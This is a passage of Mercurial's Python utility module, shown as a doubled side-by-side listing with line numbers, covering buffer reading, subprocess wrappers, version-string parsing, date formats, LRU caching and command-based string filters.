386 """return at most 'size' data from the buffer
386 """return at most 'size' data from the buffer
387
387
388 The data are removed from the buffer."""
388 The data are removed from the buffer."""
389 if size == 0 or not self._buffer:
389 if size == 0 or not self._buffer:
390 return ''
390 return ''
391 buf = self._buffer[0]
391 buf = self._buffer[0]
392 if 1 < len(self._buffer):
392 if 1 < len(self._buffer):
393 buf = ''.join(self._buffer)
393 buf = ''.join(self._buffer)
394
394
395 data = buf[:size]
395 data = buf[:size]
396 buf = buf[len(data):]
396 buf = buf[len(data):]
397 if buf:
397 if buf:
398 self._buffer = [buf]
398 self._buffer = [buf]
399 self._lenbuf = len(buf)
399 self._lenbuf = len(buf)
400 else:
400 else:
401 self._buffer = []
401 self._buffer = []
402 self._lenbuf = 0
402 self._lenbuf = 0
403 return data
403 return data
404
404
405 def _fillbuffer(self):
405 def _fillbuffer(self):
406 """read data to the buffer"""
406 """read data to the buffer"""
407 data = os.read(self._input.fileno(), _chunksize)
407 data = os.read(self._input.fileno(), _chunksize)
408 if not data:
408 if not data:
409 self._eof = True
409 self._eof = True
410 else:
410 else:
411 self._lenbuf += len(data)
411 self._lenbuf += len(data)
412 self._buffer.append(data)
412 self._buffer.append(data)
413
413
414 def mmapread(fp):
414 def mmapread(fp):
415 try:
415 try:
416 fd = getattr(fp, 'fileno', lambda: fp)()
416 fd = getattr(fp, 'fileno', lambda: fp)()
417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
418 except ValueError:
418 except ValueError:
419 # Empty files cannot be mmapped, but mmapread should still work. Check
419 # Empty files cannot be mmapped, but mmapread should still work. Check
420 # if the file is empty, and if so, return an empty buffer.
420 # if the file is empty, and if so, return an empty buffer.
421 if os.fstat(fd).st_size == 0:
421 if os.fstat(fd).st_size == 0:
422 return ''
422 return ''
423 raise
423 raise
424
424
425 def popen2(cmd, env=None, newlines=False):
425 def popen2(cmd, env=None, newlines=False):
426 # Setting bufsize to -1 lets the system decide the buffer size.
426 # Setting bufsize to -1 lets the system decide the buffer size.
427 # The default for bufsize is 0, meaning unbuffered. This leads to
427 # The default for bufsize is 0, meaning unbuffered. This leads to
428 # poor performance on Mac OS X: http://bugs.python.org/issue4194
428 # poor performance on Mac OS X: http://bugs.python.org/issue4194
429 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
429 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
430 close_fds=closefds,
430 close_fds=closefds,
431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
432 universal_newlines=newlines,
432 universal_newlines=newlines,
433 env=env)
433 env=env)
434 return p.stdin, p.stdout
434 return p.stdin, p.stdout
435
435
436 def popen3(cmd, env=None, newlines=False):
436 def popen3(cmd, env=None, newlines=False):
437 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
437 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
438 return stdin, stdout, stderr
438 return stdin, stdout, stderr
439
439
440 def popen4(cmd, env=None, newlines=False, bufsize=-1):
440 def popen4(cmd, env=None, newlines=False, bufsize=-1):
441 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
441 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
442 close_fds=closefds,
442 close_fds=closefds,
443 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
443 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
444 stderr=subprocess.PIPE,
444 stderr=subprocess.PIPE,
445 universal_newlines=newlines,
445 universal_newlines=newlines,
446 env=env)
446 env=env)
447 return p.stdin, p.stdout, p.stderr, p
447 return p.stdin, p.stdout, p.stderr, p
448
448
449 def version():
449 def version():
450 """Return version information if available."""
450 """Return version information if available."""
451 try:
451 try:
452 from . import __version__
452 from . import __version__
453 return __version__.version
453 return __version__.version
454 except ImportError:
454 except ImportError:
455 return 'unknown'
455 return 'unknown'
456
456
457 def versiontuple(v=None, n=4):
457 def versiontuple(v=None, n=4):
458 """Parses a Mercurial version string into an N-tuple.
458 """Parses a Mercurial version string into an N-tuple.
459
459
460 The version string to be parsed is specified with the ``v`` argument.
460 The version string to be parsed is specified with the ``v`` argument.
461 If it isn't defined, the current Mercurial version string will be parsed.
461 If it isn't defined, the current Mercurial version string will be parsed.
462
462
463 ``n`` can be 2, 3, or 4. Here is how some version strings map to
463 ``n`` can be 2, 3, or 4. Here is how some version strings map to
464 returned values:
464 returned values:
465
465
466 >>> v = b'3.6.1+190-df9b73d2d444'
466 >>> v = b'3.6.1+190-df9b73d2d444'
467 >>> versiontuple(v, 2)
467 >>> versiontuple(v, 2)
468 (3, 6)
468 (3, 6)
469 >>> versiontuple(v, 3)
469 >>> versiontuple(v, 3)
470 (3, 6, 1)
470 (3, 6, 1)
471 >>> versiontuple(v, 4)
471 >>> versiontuple(v, 4)
472 (3, 6, 1, '190-df9b73d2d444')
472 (3, 6, 1, '190-df9b73d2d444')
473
473
474 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
474 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
475 (3, 6, 1, '190-df9b73d2d444+20151118')
475 (3, 6, 1, '190-df9b73d2d444+20151118')
476
476
477 >>> v = b'3.6'
477 >>> v = b'3.6'
478 >>> versiontuple(v, 2)
478 >>> versiontuple(v, 2)
479 (3, 6)
479 (3, 6)
480 >>> versiontuple(v, 3)
480 >>> versiontuple(v, 3)
481 (3, 6, None)
481 (3, 6, None)
482 >>> versiontuple(v, 4)
482 >>> versiontuple(v, 4)
483 (3, 6, None, None)
483 (3, 6, None, None)
484
484
485 >>> v = b'3.9-rc'
485 >>> v = b'3.9-rc'
486 >>> versiontuple(v, 2)
486 >>> versiontuple(v, 2)
487 (3, 9)
487 (3, 9)
488 >>> versiontuple(v, 3)
488 >>> versiontuple(v, 3)
489 (3, 9, None)
489 (3, 9, None)
490 >>> versiontuple(v, 4)
490 >>> versiontuple(v, 4)
491 (3, 9, None, 'rc')
491 (3, 9, None, 'rc')
492
492
493 >>> v = b'3.9-rc+2-02a8fea4289b'
493 >>> v = b'3.9-rc+2-02a8fea4289b'
494 >>> versiontuple(v, 2)
494 >>> versiontuple(v, 2)
495 (3, 9)
495 (3, 9)
496 >>> versiontuple(v, 3)
496 >>> versiontuple(v, 3)
497 (3, 9, None)
497 (3, 9, None)
498 >>> versiontuple(v, 4)
498 >>> versiontuple(v, 4)
499 (3, 9, None, 'rc+2-02a8fea4289b')
499 (3, 9, None, 'rc+2-02a8fea4289b')
500 """
500 """
501 if not v:
501 if not v:
502 v = version()
502 v = version()
503 parts = remod.split('[\+-]', v, 1)
503 parts = remod.split('[\+-]', v, 1)
504 if len(parts) == 1:
504 if len(parts) == 1:
505 vparts, extra = parts[0], None
505 vparts, extra = parts[0], None
506 else:
506 else:
507 vparts, extra = parts
507 vparts, extra = parts
508
508
509 vints = []
509 vints = []
510 for i in vparts.split('.'):
510 for i in vparts.split('.'):
511 try:
511 try:
512 vints.append(int(i))
512 vints.append(int(i))
513 except ValueError:
513 except ValueError:
514 break
514 break
515 # (3, 6) -> (3, 6, None)
515 # (3, 6) -> (3, 6, None)
516 while len(vints) < 3:
516 while len(vints) < 3:
517 vints.append(None)
517 vints.append(None)
518
518
519 if n == 2:
519 if n == 2:
520 return (vints[0], vints[1])
520 return (vints[0], vints[1])
521 if n == 3:
521 if n == 3:
522 return (vints[0], vints[1], vints[2])
522 return (vints[0], vints[1], vints[2])
523 if n == 4:
523 if n == 4:
524 return (vints[0], vints[1], vints[2], extra)
524 return (vints[0], vints[1], vints[2], extra)
525
525
526 # used by parsedate
526 # used by parsedate
527 defaultdateformats = (
527 defaultdateformats = (
528 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
528 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
529 '%Y-%m-%dT%H:%M', # without seconds
529 '%Y-%m-%dT%H:%M', # without seconds
530 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
530 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
531 '%Y-%m-%dT%H%M', # without seconds
531 '%Y-%m-%dT%H%M', # without seconds
532 '%Y-%m-%d %H:%M:%S', # our common legal variant
532 '%Y-%m-%d %H:%M:%S', # our common legal variant
533 '%Y-%m-%d %H:%M', # without seconds
533 '%Y-%m-%d %H:%M', # without seconds
534 '%Y-%m-%d %H%M%S', # without :
534 '%Y-%m-%d %H%M%S', # without :
535 '%Y-%m-%d %H%M', # without seconds
535 '%Y-%m-%d %H%M', # without seconds
536 '%Y-%m-%d %I:%M:%S%p',
536 '%Y-%m-%d %I:%M:%S%p',
537 '%Y-%m-%d %H:%M',
537 '%Y-%m-%d %H:%M',
538 '%Y-%m-%d %I:%M%p',
538 '%Y-%m-%d %I:%M%p',
539 '%Y-%m-%d',
539 '%Y-%m-%d',
540 '%m-%d',
540 '%m-%d',
541 '%m/%d',
541 '%m/%d',
542 '%m/%d/%y',
542 '%m/%d/%y',
543 '%m/%d/%Y',
543 '%m/%d/%Y',
544 '%a %b %d %H:%M:%S %Y',
544 '%a %b %d %H:%M:%S %Y',
545 '%a %b %d %I:%M:%S%p %Y',
545 '%a %b %d %I:%M:%S%p %Y',
546 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
546 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
547 '%b %d %H:%M:%S %Y',
547 '%b %d %H:%M:%S %Y',
548 '%b %d %I:%M:%S%p %Y',
548 '%b %d %I:%M:%S%p %Y',
549 '%b %d %H:%M:%S',
549 '%b %d %H:%M:%S',
550 '%b %d %I:%M:%S%p',
550 '%b %d %I:%M:%S%p',
551 '%b %d %H:%M',
551 '%b %d %H:%M',
552 '%b %d %I:%M%p',
552 '%b %d %I:%M%p',
553 '%b %d %Y',
553 '%b %d %Y',
554 '%b %d',
554 '%b %d',
555 '%H:%M:%S',
555 '%H:%M:%S',
556 '%I:%M:%S%p',
556 '%I:%M:%S%p',
557 '%H:%M',
557 '%H:%M',
558 '%I:%M%p',
558 '%I:%M%p',
559 )
559 )
560
560
561 extendeddateformats = defaultdateformats + (
561 extendeddateformats = defaultdateformats + (
562 "%Y",
562 "%Y",
563 "%Y-%m",
563 "%Y-%m",
564 "%b",
564 "%b",
565 "%b %Y",
565 "%b %Y",
566 )
566 )
567
567
568 def cachefunc(func):
568 def cachefunc(func):
569 '''cache the result of function calls'''
569 '''cache the result of function calls'''
570 # XXX doesn't handle keywords args
570 # XXX doesn't handle keywords args
571 if func.__code__.co_argcount == 0:
571 if func.__code__.co_argcount == 0:
572 cache = []
572 cache = []
573 def f():
573 def f():
574 if len(cache) == 0:
574 if len(cache) == 0:
575 cache.append(func())
575 cache.append(func())
576 return cache[0]
576 return cache[0]
577 return f
577 return f
578 cache = {}
578 cache = {}
579 if func.__code__.co_argcount == 1:
579 if func.__code__.co_argcount == 1:
580 # we gain a small amount of time because
580 # we gain a small amount of time because
581 # we don't need to pack/unpack the list
581 # we don't need to pack/unpack the list
582 def f(arg):
582 def f(arg):
583 if arg not in cache:
583 if arg not in cache:
584 cache[arg] = func(arg)
584 cache[arg] = func(arg)
585 return cache[arg]
585 return cache[arg]
586 else:
586 else:
587 def f(*args):
587 def f(*args):
588 if args not in cache:
588 if args not in cache:
589 cache[args] = func(*args)
589 cache[args] = func(*args)
590 return cache[args]
590 return cache[args]
591
591
592 return f
592 return f
593
593
594 class cow(object):
594 class cow(object):
595 """helper class to make copy-on-write easier
595 """helper class to make copy-on-write easier
596
596
597 Call preparewrite before doing any writes.
597 Call preparewrite before doing any writes.
598 """
598 """
599
599
600 def preparewrite(self):
600 def preparewrite(self):
601 """call this before writes, return self or a copied new object"""
601 """call this before writes, return self or a copied new object"""
602 if getattr(self, '_copied', 0):
602 if getattr(self, '_copied', 0):
603 self._copied -= 1
603 self._copied -= 1
604 return self.__class__(self)
604 return self.__class__(self)
605 return self
605 return self
606
606
607 def copy(self):
607 def copy(self):
608 """always do a cheap copy"""
608 """always do a cheap copy"""
609 self._copied = getattr(self, '_copied', 0) + 1
609 self._copied = getattr(self, '_copied', 0) + 1
610 return self
610 return self
611
611
612 class sortdict(collections.OrderedDict):
612 class sortdict(collections.OrderedDict):
613 '''a simple sorted dictionary
613 '''a simple sorted dictionary
614
614
615 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
615 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
616 >>> d2 = d1.copy()
616 >>> d2 = d1.copy()
617 >>> d2
617 >>> d2
618 sortdict([('a', 0), ('b', 1)])
618 sortdict([('a', 0), ('b', 1)])
619 >>> d2.update([(b'a', 2)])
619 >>> d2.update([(b'a', 2)])
620 >>> list(d2.keys()) # should still be in last-set order
620 >>> list(d2.keys()) # should still be in last-set order
621 ['b', 'a']
621 ['b', 'a']
622 '''
622 '''
623
623
624 def __setitem__(self, key, value):
624 def __setitem__(self, key, value):
625 if key in self:
625 if key in self:
626 del self[key]
626 del self[key]
627 super(sortdict, self).__setitem__(key, value)
627 super(sortdict, self).__setitem__(key, value)
628
628
629 if pycompat.ispypy:
629 if pycompat.ispypy:
630 # __setitem__() isn't called as of PyPy 5.8.0
630 # __setitem__() isn't called as of PyPy 5.8.0
631 def update(self, src):
631 def update(self, src):
632 if isinstance(src, dict):
632 if isinstance(src, dict):
633 src = src.iteritems()
633 src = src.iteritems()
634 for k, v in src:
634 for k, v in src:
635 self[k] = v
635 self[k] = v
636
636
637 class cowdict(cow, dict):
637 class cowdict(cow, dict):
638 """copy-on-write dict
638 """copy-on-write dict
639
639
640 Be sure to call d = d.preparewrite() before writing to d.
640 Be sure to call d = d.preparewrite() before writing to d.
641
641
642 >>> a = cowdict()
642 >>> a = cowdict()
643 >>> a is a.preparewrite()
643 >>> a is a.preparewrite()
644 True
644 True
645 >>> b = a.copy()
645 >>> b = a.copy()
646 >>> b is a
646 >>> b is a
647 True
647 True
648 >>> c = b.copy()
648 >>> c = b.copy()
649 >>> c is a
649 >>> c is a
650 True
650 True
651 >>> a = a.preparewrite()
651 >>> a = a.preparewrite()
652 >>> b is a
652 >>> b is a
653 False
653 False
654 >>> a is a.preparewrite()
654 >>> a is a.preparewrite()
655 True
655 True
656 >>> c = c.preparewrite()
656 >>> c = c.preparewrite()
657 >>> b is c
657 >>> b is c
658 False
658 False
659 >>> b is b.preparewrite()
659 >>> b is b.preparewrite()
660 True
660 True
661 """
661 """
662
662
663 class cowsortdict(cow, sortdict):
663 class cowsortdict(cow, sortdict):
664 """copy-on-write sortdict
664 """copy-on-write sortdict
665
665
666 Be sure to call d = d.preparewrite() before writing to d.
666 Be sure to call d = d.preparewrite() before writing to d.
667 """
667 """
668
668
669 class transactional(object):
669 class transactional(object):
670 """Base class for making a transactional type into a context manager."""
670 """Base class for making a transactional type into a context manager."""
671 __metaclass__ = abc.ABCMeta
671 __metaclass__ = abc.ABCMeta
672
672
673 @abc.abstractmethod
673 @abc.abstractmethod
674 def close(self):
674 def close(self):
675 """Successfully closes the transaction."""
675 """Successfully closes the transaction."""
676
676
677 @abc.abstractmethod
677 @abc.abstractmethod
678 def release(self):
678 def release(self):
679 """Marks the end of the transaction.
679 """Marks the end of the transaction.
680
680
681 If the transaction has not been closed, it will be aborted.
681 If the transaction has not been closed, it will be aborted.
682 """
682 """
683
683
684 def __enter__(self):
684 def __enter__(self):
685 return self
685 return self
686
686
687 def __exit__(self, exc_type, exc_val, exc_tb):
687 def __exit__(self, exc_type, exc_val, exc_tb):
688 try:
688 try:
689 if exc_type is None:
689 if exc_type is None:
690 self.close()
690 self.close()
691 finally:
691 finally:
692 self.release()
692 self.release()
693
693
694 @contextlib.contextmanager
694 @contextlib.contextmanager
695 def acceptintervention(tr=None):
695 def acceptintervention(tr=None):
696 """A context manager that closes the transaction on InterventionRequired
696 """A context manager that closes the transaction on InterventionRequired
697
697
698 If no transaction was provided, this simply runs the body and returns
698 If no transaction was provided, this simply runs the body and returns
699 """
699 """
700 if not tr:
700 if not tr:
701 yield
701 yield
702 return
702 return
703 try:
703 try:
704 yield
704 yield
705 tr.close()
705 tr.close()
706 except error.InterventionRequired:
706 except error.InterventionRequired:
707 tr.close()
707 tr.close()
708 raise
708 raise
709 finally:
709 finally:
710 tr.release()
710 tr.release()
711
711
712 @contextlib.contextmanager
712 @contextlib.contextmanager
713 def nullcontextmanager():
713 def nullcontextmanager():
714 yield
714 yield
715
715
716 class _lrucachenode(object):
716 class _lrucachenode(object):
717 """A node in a doubly linked list.
717 """A node in a doubly linked list.
718
718
719 Holds a reference to nodes on either side as well as a key-value
719 Holds a reference to nodes on either side as well as a key-value
720 pair for the dictionary entry.
720 pair for the dictionary entry.
721 """
721 """
722 __slots__ = (u'next', u'prev', u'key', u'value')
722 __slots__ = (u'next', u'prev', u'key', u'value')
723
723
724 def __init__(self):
724 def __init__(self):
725 self.next = None
725 self.next = None
726 self.prev = None
726 self.prev = None
727
727
728 self.key = _notset
728 self.key = _notset
729 self.value = None
729 self.value = None
730
730
731 def markempty(self):
731 def markempty(self):
732 """Mark the node as emptied."""
732 """Mark the node as emptied."""
733 self.key = _notset
733 self.key = _notset
734
734
735 class lrucachedict(object):
735 class lrucachedict(object):
736 """Dict that caches most recent accesses and sets.
736 """Dict that caches most recent accesses and sets.
737
737
738 The dict consists of an actual backing dict - indexed by original
738 The dict consists of an actual backing dict - indexed by original
739 key - and a doubly linked circular list defining the order of entries in
739 key - and a doubly linked circular list defining the order of entries in
740 the cache.
740 the cache.
741
741
742 The head node is the newest entry in the cache. If the cache is full,
742 The head node is the newest entry in the cache. If the cache is full,
743 we recycle head.prev and make it the new head. Cache accesses result in
743 we recycle head.prev and make it the new head. Cache accesses result in
744 the node being moved to before the existing head and being marked as the
744 the node being moved to before the existing head and being marked as the
745 new head node.
745 new head node.
746 """
746 """
747 def __init__(self, max):
747 def __init__(self, max):
748 self._cache = {}
748 self._cache = {}
749
749
750 self._head = head = _lrucachenode()
750 self._head = head = _lrucachenode()
751 head.prev = head
751 head.prev = head
752 head.next = head
752 head.next = head
753 self._size = 1
753 self._size = 1
754 self._capacity = max
754 self._capacity = max
755
755
756 def __len__(self):
756 def __len__(self):
757 return len(self._cache)
757 return len(self._cache)
758
758
759 def __contains__(self, k):
759 def __contains__(self, k):
760 return k in self._cache
760 return k in self._cache
761
761
762 def __iter__(self):
762 def __iter__(self):
763 # We don't have to iterate in cache order, but why not.
763 # We don't have to iterate in cache order, but why not.
764 n = self._head
764 n = self._head
765 for i in range(len(self._cache)):
765 for i in range(len(self._cache)):
766 yield n.key
766 yield n.key
767 n = n.next
767 n = n.next
768
768
769 def __getitem__(self, k):
769 def __getitem__(self, k):
770 node = self._cache[k]
770 node = self._cache[k]
771 self._movetohead(node)
771 self._movetohead(node)
772 return node.value
772 return node.value
773
773
774 def __setitem__(self, k, v):
774 def __setitem__(self, k, v):
775 node = self._cache.get(k)
775 node = self._cache.get(k)
776 # Replace existing value and mark as newest.
776 # Replace existing value and mark as newest.
777 if node is not None:
777 if node is not None:
778 node.value = v
778 node.value = v
779 self._movetohead(node)
779 self._movetohead(node)
780 return
780 return
781
781
782 if self._size < self._capacity:
782 if self._size < self._capacity:
783 node = self._addcapacity()
783 node = self._addcapacity()
784 else:
784 else:
785 # Grab the last/oldest item.
785 # Grab the last/oldest item.
786 node = self._head.prev
786 node = self._head.prev
787
787
788 # At capacity. Kill the old entry.
788 # At capacity. Kill the old entry.
789 if node.key is not _notset:
789 if node.key is not _notset:
790 del self._cache[node.key]
790 del self._cache[node.key]
791
791
792 node.key = k
792 node.key = k
793 node.value = v
793 node.value = v
794 self._cache[k] = node
794 self._cache[k] = node
795 # And mark it as newest entry. No need to adjust order since it
795 # And mark it as newest entry. No need to adjust order since it
796 # is already self._head.prev.
796 # is already self._head.prev.
797 self._head = node
797 self._head = node
798
798
799 def __delitem__(self, k):
799 def __delitem__(self, k):
800 node = self._cache.pop(k)
800 node = self._cache.pop(k)
801 node.markempty()
801 node.markempty()
802
802
803 # Temporarily mark as newest item before re-adjusting head to make
803 # Temporarily mark as newest item before re-adjusting head to make
804 # this node the oldest item.
804 # this node the oldest item.
805 self._movetohead(node)
805 self._movetohead(node)
806 self._head = node.next
806 self._head = node.next
807
807
808 # Additional dict methods.
808 # Additional dict methods.
809
809
810 def get(self, k, default=None):
810 def get(self, k, default=None):
811 try:
811 try:
812 return self._cache[k].value
812 return self._cache[k].value
813 except KeyError:
813 except KeyError:
814 return default
814 return default
815
815
816 def clear(self):
816 def clear(self):
817 n = self._head
817 n = self._head
818 while n.key is not _notset:
818 while n.key is not _notset:
819 n.markempty()
819 n.markempty()
820 n = n.next
820 n = n.next
821
821
822 self._cache.clear()
822 self._cache.clear()
823
823
824 def copy(self):
824 def copy(self):
825 result = lrucachedict(self._capacity)
825 result = lrucachedict(self._capacity)
826 n = self._head.prev
826 n = self._head.prev
827 # Iterate in oldest-to-newest order, so the copy has the right ordering
827 # Iterate in oldest-to-newest order, so the copy has the right ordering
828 for i in range(len(self._cache)):
828 for i in range(len(self._cache)):
829 result[n.key] = n.value
829 result[n.key] = n.value
830 n = n.prev
830 n = n.prev
831 return result
831 return result
832
832
833 def _movetohead(self, node):
833 def _movetohead(self, node):
834 """Mark a node as the newest, making it the new head.
834 """Mark a node as the newest, making it the new head.
835
835
836 When a node is accessed, it becomes the freshest entry in the LRU
836 When a node is accessed, it becomes the freshest entry in the LRU
837 list, which is denoted by self._head.
837 list, which is denoted by self._head.
838
838
839 Visually, let's make ``N`` the new head node (* denotes head):
839 Visually, let's make ``N`` the new head node (* denotes head):
840
840
841 previous/oldest <-> head <-> next/next newest
841 previous/oldest <-> head <-> next/next newest
842
842
843 ----<->--- A* ---<->-----
843 ----<->--- A* ---<->-----
844 | |
844 | |
845 E <-> D <-> N <-> C <-> B
845 E <-> D <-> N <-> C <-> B
846
846
847 To:
847 To:
848
848
849 ----<->--- N* ---<->-----
849 ----<->--- N* ---<->-----
850 | |
850 | |
851 E <-> D <-> C <-> B <-> A
851 E <-> D <-> C <-> B <-> A
852
852
853 This requires the following moves:
853 This requires the following moves:
854
854
855 C.next = D (node.prev.next = node.next)
855 C.next = D (node.prev.next = node.next)
856 D.prev = C (node.next.prev = node.prev)
856 D.prev = C (node.next.prev = node.prev)
857 E.next = N (head.prev.next = node)
857 E.next = N (head.prev.next = node)
858 N.prev = E (node.prev = head.prev)
858 N.prev = E (node.prev = head.prev)
859 N.next = A (node.next = head)
859 N.next = A (node.next = head)
860 A.prev = N (head.prev = node)
860 A.prev = N (head.prev = node)
861 """
861 """
862 head = self._head
862 head = self._head
863 # C.next = D
863 # C.next = D
864 node.prev.next = node.next
864 node.prev.next = node.next
865 # D.prev = C
865 # D.prev = C
866 node.next.prev = node.prev
866 node.next.prev = node.prev
867 # N.prev = E
867 # N.prev = E
868 node.prev = head.prev
868 node.prev = head.prev
869 # N.next = A
869 # N.next = A
870 # It is tempting to do just "head" here, however if node is
870 # It is tempting to do just "head" here, however if node is
871 # adjacent to head, this will do bad things.
871 # adjacent to head, this will do bad things.
872 node.next = head.prev.next
872 node.next = head.prev.next
873 # E.next = N
873 # E.next = N
874 node.next.prev = node
874 node.next.prev = node
875 # A.prev = N
875 # A.prev = N
876 node.prev.next = node
876 node.prev.next = node
877
877
878 self._head = node
878 self._head = node
879
879
880 def _addcapacity(self):
880 def _addcapacity(self):
881 """Add a node to the circular linked list.
881 """Add a node to the circular linked list.
882
882
883 The new node is inserted before the head node.
883 The new node is inserted before the head node.
884 """
884 """
885 head = self._head
885 head = self._head
886 node = _lrucachenode()
886 node = _lrucachenode()
887 head.prev.next = node
887 head.prev.next = node
888 node.prev = head.prev
888 node.prev = head.prev
889 node.next = head
889 node.next = head
890 head.prev = node
890 head.prev = node
891 self._size += 1
891 self._size += 1
892 return node
892 return node
893
893
894 def lrucachefunc(func):
894 def lrucachefunc(func):
895 '''cache most recent results of function calls'''
895 '''cache most recent results of function calls'''
896 cache = {}
896 cache = {}
897 order = collections.deque()
897 order = collections.deque()
898 if func.__code__.co_argcount == 1:
898 if func.__code__.co_argcount == 1:
899 def f(arg):
899 def f(arg):
900 if arg not in cache:
900 if arg not in cache:
901 if len(cache) > 20:
901 if len(cache) > 20:
902 del cache[order.popleft()]
902 del cache[order.popleft()]
903 cache[arg] = func(arg)
903 cache[arg] = func(arg)
904 else:
904 else:
905 order.remove(arg)
905 order.remove(arg)
906 order.append(arg)
906 order.append(arg)
907 return cache[arg]
907 return cache[arg]
908 else:
908 else:
909 def f(*args):
909 def f(*args):
910 if args not in cache:
910 if args not in cache:
911 if len(cache) > 20:
911 if len(cache) > 20:
912 del cache[order.popleft()]
912 del cache[order.popleft()]
913 cache[args] = func(*args)
913 cache[args] = func(*args)
914 else:
914 else:
915 order.remove(args)
915 order.remove(args)
916 order.append(args)
916 order.append(args)
917 return cache[args]
917 return cache[args]
918
918
919 return f
919 return f
920
920
921 class propertycache(object):
921 class propertycache(object):
922 def __init__(self, func):
922 def __init__(self, func):
923 self.func = func
923 self.func = func
924 self.name = func.__name__
924 self.name = func.__name__
925 def __get__(self, obj, type=None):
925 def __get__(self, obj, type=None):
926 result = self.func(obj)
926 result = self.func(obj)
927 self.cachevalue(obj, result)
927 self.cachevalue(obj, result)
928 return result
928 return result
929
929
930 def cachevalue(self, obj, value):
930 def cachevalue(self, obj, value):
931 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
931 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
932 obj.__dict__[self.name] = value
932 obj.__dict__[self.name] = value
933
933
934 def pipefilter(s, cmd):
934 def pipefilter(s, cmd):
935 '''filter string S through command CMD, returning its output'''
935 '''filter string S through command CMD, returning its output'''
936 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
936 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
937 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
937 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
938 pout, perr = p.communicate(s)
938 pout, perr = p.communicate(s)
939 return pout
939 return pout
940
940
941 def tempfilter(s, cmd):
941 def tempfilter(s, cmd):
942 '''filter string S through a pair of temporary files with CMD.
942 '''filter string S through a pair of temporary files with CMD.
943 CMD is used as a template to create the real command to be run,
943 CMD is used as a template to create the real command to be run,
944 with the strings INFILE and OUTFILE replaced by the real names of
944 with the strings INFILE and OUTFILE replaced by the real names of
945 the temporary files generated.'''
945 the temporary files generated.'''
946 inname, outname = None, None
946 inname, outname = None, None
947 try:
947 try:
948 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
948 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
949 fp = os.fdopen(infd, pycompat.sysstr('wb'))
949 fp = os.fdopen(infd, pycompat.sysstr('wb'))
950 fp.write(s)
950 fp.write(s)
951 fp.close()
951 fp.close()
952 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
952 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
953 os.close(outfd)
953 os.close(outfd)
954 cmd = cmd.replace('INFILE', inname)
954 cmd = cmd.replace('INFILE', inname)
955 cmd = cmd.replace('OUTFILE', outname)
955 cmd = cmd.replace('OUTFILE', outname)
956 code = os.system(cmd)
956 code = os.system(cmd)
957 if pycompat.sysplatform == 'OpenVMS' and code & 1:
957 if pycompat.sysplatform == 'OpenVMS' and code & 1:
958 code = 0
958 code = 0
959 if code:
959 if code:
960 raise Abort(_("command '%s' failed: %s") %
960 raise Abort(_("command '%s' failed: %s") %
961 (cmd, explainexit(code)))
961 (cmd, explainexit(code)))
962 return readfile(outname)
962 return readfile(outname)
963 finally:
963 finally:
964 try:
964 try:
965 if inname:
965 if inname:
966 os.unlink(inname)
966 os.unlink(inname)
967 except OSError:
967 except OSError:
968 pass
968 pass
969 try:
969 try:
970 if outname:
970 if outname:
971 os.unlink(outname)
971 os.unlink(outname)
972 except OSError:
972 except OSError:
973 pass
973 pass
974
974
975 filtertable = {
975 filtertable = {
976 'tempfile:': tempfilter,
976 'tempfile:': tempfilter,
977 'pipe:': pipefilter,
977 'pipe:': pipefilter,
978 }
978 }
979
979
980 def filter(s, cmd):
980 def filter(s, cmd):
981 "filter a string through a command that transforms its input to its output"
981 "filter a string through a command that transforms its input to its output"
982 for name, fn in filtertable.iteritems():
982 for name, fn in filtertable.iteritems():
983 if cmd.startswith(name):
983 if cmd.startswith(name):
984 return fn(s, cmd[len(name):].lstrip())
984 return fn(s, cmd[len(name):].lstrip())
985 return pipefilter(s, cmd)
985 return pipefilter(s, cmd)
986
986
987 def binary(s):
987 def binary(s):
988 """return true if a string is binary data"""
988 """return true if a string is binary data"""
989 return bool(s and '\0' in s)
989 return bool(s and '\0' in s)
990
990
991 def increasingchunks(source, min=1024, max=65536):
991 def increasingchunks(source, min=1024, max=65536):
992 '''return no less than min bytes per chunk while data remains,
992 '''return no less than min bytes per chunk while data remains,
993 doubling min after each chunk until it reaches max'''
993 doubling min after each chunk until it reaches max'''
994 def log2(x):
994 def log2(x):
995 if not x:
995 if not x:
996 return 0
996 return 0
997 i = 0
997 i = 0
998 while x:
998 while x:
999 x >>= 1
999 x >>= 1
1000 i += 1
1000 i += 1
1001 return i - 1
1001 return i - 1
1002
1002
1003 buf = []
1003 buf = []
1004 blen = 0
1004 blen = 0
1005 for chunk in source:
1005 for chunk in source:
1006 buf.append(chunk)
1006 buf.append(chunk)
1007 blen += len(chunk)
1007 blen += len(chunk)
1008 if blen >= min:
1008 if blen >= min:
1009 if min < max:
1009 if min < max:
1010 min = min << 1
1010 min = min << 1
1011 nmin = 1 << log2(blen)
1011 nmin = 1 << log2(blen)
1012 if nmin > min:
1012 if nmin > min:
